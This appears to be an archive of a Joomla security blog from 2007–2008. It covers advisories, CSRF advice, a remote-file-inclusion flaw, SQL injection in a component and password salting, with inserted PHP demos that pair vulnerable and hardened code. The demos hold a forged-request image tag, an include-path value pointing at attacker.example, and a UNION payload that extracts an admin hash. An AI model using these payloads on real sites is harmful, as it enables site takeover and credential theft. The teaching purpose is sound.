February 9th, 2008
The Joomla Core team have today released Joomla 1.5.1 specifically to address a security issue.
The official announcement was:
The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.1 [Seenu]. Since the stable release of Joomla! 1.5 we have seen huge numbers of downloads which has helped to push the total number of downloads to over 3 million in less than a year.
We have found in one of the new features of Joomla! 1.5, an XML-RPC Blogger API plugin, a high priority security vulnerability. While this feature is disabled by default on every Joomla! 1.5 install and would have to be manually enabled for the vulnerability to exist, we strongly recommend that all Joomla! 1.5 users upgrade to Joomla! 1.5.1.
Thanks to the work done by both the Joomla! Bug Squad and the Development Team, not only has this vulnerability been patched but so have several other smaller issues.
Posted in Announcements, Joomla 1.5.1, New Releases, Security
February 6th, 2008
The core developers of Joomla! have just released a statement about a security exploit in Joomla 1.5.0:
After releasing Joomla! 1.5 stable we have discovered a high priority security issue.
The vulnerability has been discovered in XML-RPC in combination with the blogger API.
There is a security problem in this code that makes it possible to alter the articles on your site (including removal). This problem has now been fixed by members of the development team and the Joomla! bug squad; the solution is available from Subversion. So what do you need to do until we release Joomla! 1.5.1?
All Joomla! users who have enabled the XML-RPC Blogger API plugin should disable it!
If you have never enabled this plugin you do not need to do anything.
This comes hot on the heels of an XML-RPC issue in WordPress too!
Posted in Announcements, Joomla 1.5, Security
January 5th, 2008
A lot of talk has gone on recently regarding CSRF and Joomla 1.0.13/1.5. CSRF is a problem for all web-based applications, and the upcoming Joomla 1.0.14 and Joomla 1.5 stable have both been hardened against such vulnerabilities. Hardened, not made secure, as it is practically impossible to guard against each and every CSRF without interrupting workflow. Joomla, like most other web apps, has made it as difficult as possible to use CSRF to hack a Joomla site.
The advice issued by ourselves recently is still just as valid now as it will be when Joomla 1.0.14/1.5 are released - Please follow these rules:
- ALWAYS click LOGOUT in Joomla Admin when you finish
- NEVER browse other websites while logged in to Joomla Admin
- If you allow users to upload to or modify your site through any third-party component, then don't browse (or at least limit your browsing of) your own site while logged in to Joomla Admin
- NEVER click on links to “Upgrade this component” in 3rd Party Components
- NEVER browse forums while logged into Joomla Admin
However, there is a better, more secure option:
Introducing PRISM

Prism (formerly Webrunner) is a prototype application that lets users split web applications out of their browser and run them directly on their desktop. What this really means in non-techie speak is that you can launch a scaled-down web browser in its own process and use that to administer your Joomla site. Prism is a scaled-down Firefox web browser designed for web applications, so it is already more secure in that it is not Internet Explorer based :-)
We have been highly active in using webrunner/prism since the first release - and we are addicted.
Learn More
Get Prism
Once you have Prism installed, simply double-click its icon and you will be prompted for a URL and a NAME (and a few optional settings).

For the URL set this as your admin console - like http://www.mysite.com/administrator/
and the NAME set to “Administrator for mySite” - also check the desktop shortcut icon.
Then you will be promptly shown your admin page. You can now log in securely and continue administering your Joomla site in Prism and NOT IN YOUR REGULAR BROWSER; this creates separation between your normal surfing and your Joomla Administrator.
By doing this you shut the door on the CSRF vulnerability reported in Joomla and other web apps: the admin session cookie is held by the separate Prism process, so a page you open in your everyday browser cannot send requests that ride on it. The protection only holds while the Prism window is used for nothing but the admin console. Once you get addicted (as we are) to Prism you will never use your browser for web applications again!!!
Hope you like the tip!
Posted in Prism, Security, Tips
January 2nd, 2008
We write this blog post with sadness. On the 4th December 2007 a nice white hat hacker notified the Joomla Core Development team of a CSRF vulnerability in Joomla 1.0.13 and Joomla 1.5 RC3. There have been many reports of these vulnerabilities around the web since then.
The nature of the vulnerability means that your site cannot be hacked while you sleep (unlike many of the other types of 3rd-party component issues); it requires you (the site's Super Admin) to be logged in to Joomla Admin while at the same time surfing sites (maybe even your own) that contain links, images or scripts that send forged requests back to your Joomla Admin Console without you knowing. This can lead to complete disaster and even complete server compromise.
The Joomla Developers took only 4 days to fix this in Joomla 1.5 SVN and then shortly after released Joomla 1.5 RC4 stating they had fixed this category A5 Security [High] Vulnerability.
To date, no changes and no attempts by the core development team have been made to the Joomla 1.0.13+ SVN tree to fix this vulnerability in Joomla 1.0.13. Update: changes are now in SVN for the next version of Joomla 1.0.x - about time!
In an effort to assist them we spent a few hours and backported code from Joomla 1.5 RC4 to Joomla 1.0.13, making all the changes required to protect Joomla 1.0.13 from this type of vulnerability.
Details of this can be found in the following forum thread:
http://forum.joomla.org/index.php/topic,248109.msg1136076.html#msg1136076
I personally emailed all three lead developers with the same information as I published there, including providing the diff/patch files to Joomla 1.0.13. I have been assured that once Joomla 1.5 stable is released time will be spent on fixing this issue in Joomla 1.0.13 (I object to this - why take 4 days to fix unreleased software and over 4 weeks to fix software running on millions of sites already?!?)
Here is my professional advice to help you stay safe from the known and published vulnerability until the next version of Joomla 1.0.x is released.
The number one piece of advice I can give all site admins at the moment is: LOG OUT OF YOUR JOOMLA ADMIN as soon as you finish using it, do not surf around the internet in other tabs/browser windows while administering your Joomla site, and if you allow users to modify your site's frontend, be careful not to surf your frontend either while logged in.
Do not install any 3rd-party components/mambots/modules/AND TEMPLATES!!! from untrusted sources; if these components choose to, they can use this vulnerability to do malicious things…
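The attack described in this post, and the hardening mentioned in the January 5th post above, both come down to one check. The following is an added example and not Joomla's own code: a minimal admin handler in the vulnerable shape (any request carrying the session cookie is acted on) beside a hardened one that requires POST plus a per-session token that only our own form carries. The function names, the task/id parameters and the article-removal stub are illustrative; it needs PHP 7 or later for random_bytes() and hash_equals().

```php
<?php
// csrf_demo.php (added example, not Joomla core code)
session_start();

// --- VULNERABLE admin action: trusts the session cookie alone --------------------------
// Any page the logged-in admin visits can trigger this with a plain image tag:
//   <img src="http://www.mysite.com/administrator/index.php?task=remove&id=7">
// The browser attaches the admin session cookie, so the request is accepted.
function handle_vulnerable(array $get): string
{
    if (($get['task'] ?? '') === 'remove') {
        return remove_article((int) ($get['id'] ?? 0));
    }
    return 'nothing to do';
}

// --- HARDENED admin action: state changes need POST plus a secret the attacker lacks ----
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function check_token(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $sent     = (string) ($post['csrf_token'] ?? '');
    // Constant-time compare. The attacker's page cannot read our token (same-origin
    // policy), so a forged request arrives without it and is rejected.
    return $expected !== '' && hash_equals($expected, $sent);
}

function handle_hardened(string $method, array $post): string
{
    if ($method !== 'POST' || !check_token($post)) {
        http_response_code(403);
        return 'Invalid token';
    }
    if (($post['task'] ?? '') === 'remove') {
        return remove_article((int) ($post['id'] ?? 0));
    }
    return 'nothing to do';
}

function remove_article(int $id): string
{
    return "article $id removed";   // stand-in for the real database delete
}

// Our own admin form embeds the token as a hidden field; the <img> trick cannot.
function render_form(): string
{
    return '<form method="post" action="index.php">'
         . '<input type="hidden" name="task" value="remove">'
         . '<input type="hidden" name="id" value="7">'
         . '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES) . '">'
         . '<button>Delete</button></form>';
}

// Dispatch, as index.php would. The old behaviour would have been:
//   echo handle_vulnerable($_GET);
echo handle_hardened($_SERVER['REQUEST_METHOD'] ?? 'GET', $_POST);
```

The forged GET in the comment fails the method check before the token is even looked at, and an auto-submitted POST form on an attacker's page fails the token check. Logging out, as the advice above says, still matters: the token lives in the session, so an idle logged-in admin remains the weak point for any action that was missed.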
Posted in Announcements, Joomla 1.0.13, Rants, Security
December 24th, 2007
There are reports circulating this Christmas Eve that the modules provided by mosDirectory v2.3.2 are vulnerable to a remote file inclusion.
Having reviewed the code I can confirm that, under the right circumstances, this can happen with all versions up to mosDirectory v2.3.7.
The modules provided by mosDirectory are all community/customer developed and submitted and added into mosDirectory by request. It appears that our quality control missed this single line of code - and for this we are very sorry - the code in this file has not changed for almost two years and has never been flagged as an issue before, we now have automated nightly builds that check for this kind of security issue.
There are no reported cases of a Joomla site being hacked through mosDirectory
There are no reported cases of a Joomla site being hacked through this vulnerability in the module.
The vulnerability is in a module, not in the main mosDirectory component.
If you are using the .htaccess file provided by Joomla then you are not vulnerable; however, all customers should upgrade to the latest mosDirectory v2.4.0 as soon as possible to ensure that you are fully protected.
The latest version of mosDirectory v2.4.0 can be downloaded by logging into your account at http://secure.myjoomla.com/
Full details of patching your site have been emailed to every customer. If you missed this email then please contact us at phil@phil-taylor.com ASAP
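For readers wondering what "a single line of code" in a Joomla 1.0 module can amount to a remote file inclusion, here is an added illustration; it is not mosDirectory's code, and the module and helper names are made up. The reason Joomla's shipped .htaccess protects you is that it rewrites any request whose query string contains mosConfig_ to a 403, so the override below never reaches PHP.

```php
<?php
// mod_example.php (added illustration of the Joomla 1.0-era RFI pattern; hypothetical names)
//
// THE ONE BAD LINE in an affected module looks like this:
//
//     require_once($mosConfig_absolute_path . '/modules/mod_example/helper.php');
//
// $mosConfig_absolute_path is meant to come from configuration.php. When the module file
// is requested directly (not via index.php) nothing has set it, and with register_globals=On
// PHP fills it from the request, so
//     /modules/mod_example.php?mosConfig_absolute_path=http://attacker.example/
// makes require_once fetch and run remote code (given allow_url_fopen/allow_url_include).
//
// HARDENED version of the same module:

// 1. Refuse direct requests. index.php defines _VALID_MOS before loading any module, and
//    loads configuration.php first, so once we get here the path variable is trusted.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
global $mosConfig_absolute_path;   // modules run inside a function, so pull in the global

// 2. Belt and braces: resolve the include target and insist it is a real file under the
//    configured root, so neither a URL nor a traversal string can reach require_once().
$root   = realpath($mosConfig_absolute_path);
$helper = realpath($mosConfig_absolute_path . '/modules/mod_example/helper.php');
if ($root === false || $helper === false
    || strpos($helper, $root . DIRECTORY_SEPARATOR) !== 0) {
    die('mod_example: refusing to include an unexpected path');
}
require_once $helper;

// 3. Module body (stand-in): render output using the helper's function.
echo mod_example_render();
```

The `_VALID_MOS` guard is the standard Joomla 1.0 fix and is sufficient on its own; the realpath() check is the extra step that also catches a misconfigured or tampered configuration.php. A quick check for your own modules is to grep for `require` or `include` lines that use a `$mosConfig_` variable and confirm each file starts with the guard.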
Posted in Announcements, Security, mosDirectory
October 19th, 2007
For many years I have steered people away from the Fasthosts web hosting company. They are based in Gloucester, UK, my home town, and the local word on the street has always been negative towards them.
I was not surprised that one of my customers who has an old fasthosts account received the following email from them this week - stating that their internal systems had been hacked!
We are writing to inform you that we have recently discovered evidence of a network intrusion involving a Fasthosts server. We have reason to believe that the intruder has gained access to our internal systems, and that this may have in turn given them access to your username and some service passwords. We have since closed the vulnerability through which access was gained, and have taken steps to ensure that this cannot happen again.
We therefore recommend, as a precaution, that you now change the following passwords on your account:
- Your main account control panel login password
- All email (Standard, Advanced and Exchange mailbox) passwords
- All FTP passwords
- All MySQL and MS SQL database passwords
These can all be changed within your control panel. Further details on how to change your passwords can also be found in the support section of our website.
We strongly recommend that you choose secure passwords so that they cannot easily be guessed. These passwords should include the following:
- It should be a minimum of 8 characters long
- It should contain an upper case and a lower case letter
- It should also contain at least one number (numeric)
We recognise that this may cause some inconvenience and concern, and for that we sincerely apologise. Please be assured that your account security is extremely important to us, and we have taken every step possible to secure your information against any future intrusion attempts.
If you have any questions relating to this, please contact our Customer Support team on 0870 888 3600 or customersupport@fasthosts.co.uk who will be happy to help you.
Yours sincerely,
The Fasthosts Internet team
Simply amazing! - There is nothing about this on their website - I guess they want to keep it on the low!
Posted in Security
July 23rd, 2007
Ever since the conception of Mambo/Joomla the passwords for admins and users have been converted into a md5 hash string and stored to the database.
In Joomla 1.0.13 (about time too!) this has changed. The password is now "salted": a random salt is appended to the password before md5 hashing, and the resulting hash and the salt are both stored in the database (as hash:salt) in place of the bare md5.
This means that Joomla 1.0.13 breaks backwards compatibility with itself (you can’t downgrade to anything before joomla 1.0.13), and with some extensions like Community Builder and Forum bridges!!
Basically any 3rd Party Component that reads/writes/validates the password of an admin or user will now FAIL in Joomla 1.0.13 unless it is updated to know about the new changes.
The salting of passwords is a good security step - we praise the core team for doing it - HOWEVER no announcement has been made about this, no blog post has been made and users are now in the dark - remember, this means you can NEVER DOWNGRADE your site if you have problems so make sure you MAKE A BACKUP before upgrading to Joomla 1.0.13 - you have now been warned!
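To make the compatibility point concrete, here is an added example (not Joomla core code) of the 1.0.13 storage format as described above, stored as `md5(password . salt):salt`, together with a verifier that still accepts the older unsalted rows. This is the shape of check a third-party component needs if it is to keep validating users across the upgrade. The 16-character salt width and its generator are assumptions; it needs PHP 7 or later.

```php
<?php
// password_demo.php (added example, not Joomla core code)

// Build a Joomla 1.0.13-style record: "<md5(password.salt)>:<salt>".
function make_salted_hash(string $password, ?string $salt = null): string
{
    $salt = $salt ?? bin2hex(random_bytes(8));   // 16 hex chars (width assumed)
    return md5($password . $salt) . ':' . $salt;
}

// Verify against either record format, so users who were created before 1.0.13
// (bare 32-char md5, no colon) can still log in through a third-party component.
function verify_password(string $password, string $stored): bool
{
    if (strpos($stored, ':') === false) {
        // Legacy row from 1.0.12 or earlier.
        return hash_equals($stored, md5($password));
    }
    [$hash, $salt] = explode(':', $stored, 2);
    return hash_equals($hash, md5($password . $salt));
}

// Worked check on constructed values.
$legacy = md5('secret');                                   // row written before 1.0.13
$salted = make_salted_hash('secret', 'abcdef0123456789'); // row written by 1.0.13

var_dump(verify_password('secret', $legacy));
var_dump(verify_password('secret', $salted));
var_dump(verify_password('wrong',  $salted));
```

The first two checks pass and the third fails. A component that still does `md5($password) == $row->password` will fail on every salted row, which is exactly the breakage described above. Note also that a salted md5 only slows down precomputed-table attacks; it is still a fast hash, so the backup-before-upgrade advice applies and so does keeping the database hashes out of reach in the first place.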
Posted in Joomla 1.0.13, Rants, Security
May 29th, 2007
The current version of Phil-A-Form is v1.6.3 - and is secure (as far as we know).
We have just been alerted to a security vulnerability in VERSION 1.2 (over a year old!): an SQL injection that allows an attacker to retrieve the md5 hash of the admin password on a Joomla site.
We know MANY customers are still running Phil-a-form v1.2 which is vulnerable, in our tests we managed to get information from all the sites tested!
We are also aware that version 1.2 of Phil-A-Form is available on some warez/illegal sites.
Only v1.2 and earlier are vulnerable. PLEASE UPGRADE PHIL-A-FORM if you are not running the latest version.
This is another reason for making sure that all Joomla Components are kept up-to-date!
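To show what "gain the md5 hash of the admin password" looks like in practice, here is an added example; it is not Phil-A-Form's code. It runs against an in-memory SQLite database (needs the pdo_sqlite extension) holding a constructed copy of the Joomla 1.0 jos_users table with one admin row, and a made-up jos_philaform table, so you can watch the unescaped id hand over the admin hash and the bound parameter refuse the same payload.

```php
<?php
// sqli_demo.php (added example; needs PHP 7+ with pdo_sqlite)
// Constructed data: one Super Administrator row, one row in a hypothetical component table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT, usertype TEXT)");
$db->exec("CREATE TABLE jos_philaform (id INTEGER, title TEXT)");
$db->exec("INSERT INTO jos_users VALUES (62, 'admin', '" . md5('secret') . "', 'Super Administrator')");
$db->exec("INSERT INTO jos_philaform VALUES (1, 'Contact form')");

// VULNERABLE: the request value is pasted into the SQL, the Joomla 1.0-era habit of
// "SELECT ... WHERE id = $id" with $id taken straight from $_GET.
function form_title_vulnerable(PDO $db, string $id): array
{
    $sql = "SELECT title FROM jos_philaform WHERE id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// HARDENED: the id is bound as an integer. Anything that is not a number collapses to 0
// (or its leading digits), so the UNION never reaches the database as SQL.
function form_title_safe(PDO $db, string $id): array
{
    $stmt = $db->prepare("SELECT title FROM jos_philaform WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// What an attacker sends as ?id=...: a UNION that pulls the admin hash into the single
// column the page echoes back.
$payload = "0 UNION SELECT password FROM jos_users WHERE usertype = 'Super Administrator'";

print_r(form_title_vulnerable($db, $payload));
print_r(form_title_safe($db, $payload));
```

The first print_r lists the 32-character md5 of the admin password; the second lists nothing. For string parameters the equivalent is binding with PDO::PARAM_STR (or, in Joomla 1.0's own database class, quoting through its escaping helper) rather than concatenating. The hash an attacker gets this way is a bare md5 on anything before Joomla 1.0.13, which is why the salting change in the post above matters.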
Posted in Announcements, Phil-A-Form, Security
March 3rd, 2007
Due to recent popular demand we are publishing details about a service that we have been providing for some time now for existing customers, but now we are opening it up to all sites.
We offer a private and confidential service to customers that will reveal all known security vulnerabilities with your server and Joomla/Joomla Components.
For that we use professional industry-standard software to scan your Joomla website for known flaws; this tests the web pages.
We then use ScanAlert (a very expensive system) to do a one-time in-depth scan of the server, domain and much more, which gives us a large report (more details on ScanAlert can be found at scanalert.com). Lastly we do a manual audit of your website: we manually review your website's PHP files and 3rd-party components/modules/mambots, and compare their versions against known issues (plus we use our full experience with Joomla to provide an in-depth service).
If you have full root access to your server we can further secure the server against known attacks. An additional fee is payable for this service as different skill sets are required and it can be more time consuming. Depending on the results of the audit this may be a recommended step; however, the costs of this are not included in the audit fee.
We will provide you with a list of issues that we find, what you do with that information then is up to you - if you are on shared hosting there may be little you can do (apart from the obvious Joomla and Joomla Component audit recommendations). If you have a dedicated server we can secure your server and Joomla installations to meet the very strict PCI Certification scheme run by MasterCard and Visa card providers. We can work with you to fully secure your dedicated server and even provide monthly audits or monitoring if you wish.
To find out more, commission an audit or to talk to us further about this service please visit http://www.joomla-expert.com, call us in the UK on 0800 358 5499 or email us
Posted in Joomla Components, Joomla Core, Joomla Services, Security
October 9th, 2006
Well, maybe. Now that I have your attention, read the following information published by the Joomla Core team.
Joomla! Developer Network
It has come to our attention that Google has released a new product, Google Code Search, that is capable of indexing and crawling through archive files stored in the public directories of web servers. We are reporting this as a security advisory because we have discovered that some site administrators are storing archives / backups of their website in the web root. Because of this, Google Code Search is able to crawl the archives and read unparsed PHP files as if they were plain text. This has resulted in the disclosure of some sensitive information including MySQL passwords and SMTP credentials.
We felt that it was necessary to release a general advisory now in order to warn the sites that have been exposed as well as to protect and educate our users on some best practices in order to keep your site secure.
1. Never store a backup or archived version of your website in a web server’s public readable directories.
2. Do not leave files that you do not want to be read/indexed/searched/downloaded in the web root.
3. If it is absolutely necessary, make your hosting provider disable directory index generation for that directory.*
4. Password protect directories that contain sensitive information.
Furthermore, if you think your site's login credentials may have been compromised in this way, please remove the backups / archives stored in the web root, change all of the associated passwords, and if necessary, ask your hosting provider to restore your site from a previous backup and be sure that they clean up after themselves and remove the archive that they used to restore your site.
If you would like more proactive protection against the indexing and downloading of related archives, please see this thread in the Joomla! Security Forums where some discussion is being held on how to protect yourself from these problems. http://forum.joomla.org/index.php/topic,101880.0.html
* Directory Indexing is a feature of mod_dir, an Apache module that will generate a list of all files in a directory if there is no index.html/php/etc file found in that directory. This is most likely how the archives are being found by Google Code Search.
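The advisory's points 2 and 3 can be enforced from the web root's .htaccess. The fragment below is an added example, not the content of the forum thread linked above; the list of extensions is a suggestion and the syntax is Apache 2.2, which is what these sites ran at the time.

```apache
# .htaccess in the web root (added example)
# Point 3: no listings when index.php/html is absent. Needs AllowOverride Options from the host.
Options -Indexes

# Point 2: never serve archives, database dumps or editor backups, even to someone who knows
# the filename (configuration.php.bak, site.tar.gz, backup.sql ...).
<FilesMatch "\.(zip|tar|gz|tgz|bz2|rar|7z|sql|bak|old|orig|swp)$">
    Order allow,deny
    Deny from all
</FilesMatch>
# On Apache 2.4 replace the two lines inside FilesMatch with: Require all denied
```

Check it with `curl -I http://www.mysite.com/backup.zip`, which should now return 403 rather than 200. This only covers names that match the pattern; an archive saved without an extension is still served, so point 1 of the advisory, keeping backups out of the web root altogether, remains the real fix.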
Posted in Joomla Core, Security